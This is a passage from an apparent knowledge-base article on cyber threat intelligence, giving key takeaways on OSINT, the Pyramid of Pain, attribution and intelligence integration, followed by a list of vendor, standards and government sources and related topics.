- CTI is OSINT-dependent at its core — programmes that treat commercial feeds as a substitute for open-source collection capability are paying for what they could largely produce internally, and surrendering analytical control of their own threat model.
- The Pyramid of Pain is a budget allocation tool — investment in TTP-level analysis (detection engineering, threat hunting, behavioural analytics) compounds; investment in tactical IOC consumption depreciates within days.
- Attribution is an analytical product, not a fact — consumers of CTI should treat all attribution claims as conditional assessments with confidence levels and underlying evidence, not as ground truth, particularly in geopolitically sensitive contexts where false-flag operations are documented adversary tradecraft.
- CTI is the integration point between cyber and traditional intelligence — geopolitical analysis, Counterintelligence, and Signals Intelligence all interact with CTI; isolating CTI as a purely technical discipline forfeits this integration value.
- The declassification model is replicable but fragile — the 2022 Ukraine pre-invasion intelligence-weaponisation campaign demonstrated CTI’s strategic-communications utility, but depends on political conditions and source-protection trade-offs that may not generalise.
Sources
- Mandiant. M-Trends (annual report series, 2010–present), together with Mandiant's standalone actor reports (APT1, 2013; APT28, 2017) and its Volt Typhoon coverage (2023 onward). Mandiant/Google Cloud. [primary, vendor analytical]
- MITRE Corporation. ATT&CK Framework Documentation. attack.mitre.org. STIX-distributed adversary TTP knowledge base. [primary, authoritative]
- Bianco, David. “The Pyramid of Pain” (blog post, originally 2013; revised). Enterprise Detection & Response. detect-respond.blogspot.com. [primary, practitioner]
- OASIS Cyber Threat Intelligence Technical Committee. STIX 2.1 and TAXII 2.1 Specifications. docs.oasis-open.org/cti/. [primary, standards body]
- CISA. Known Exploited Vulnerabilities Catalog and joint cybersecurity advisories. cisa.gov/known-exploited-vulnerabilities-catalog. [primary, authoritative]
- NSA / CISA / FBI joint advisories on Russian, Chinese, Iranian, and DPRK state-actor activity (2018–present). [primary, authoritative]
- Recorded Future. Annual Threat Intelligence Reports (Insikt Group). recordedfuture.com. [primary, vendor analytical]
- CrowdStrike. Global Threat Report (annual). crowdstrike.com. [primary, vendor analytical]
Key Connections
Intelligence, Intelligence Cycle, Signals Intelligence, OSINT, Dark Web Methodology, DARKINT, Advanced Persistent Threats, Attribution, Network Analysis Methodology, Shodan-Censys Guide, Traffic Light Protocol, Counterintelligence, Indications and Warning, Disinformation Detection Methodology, Python OSINT Automation Guide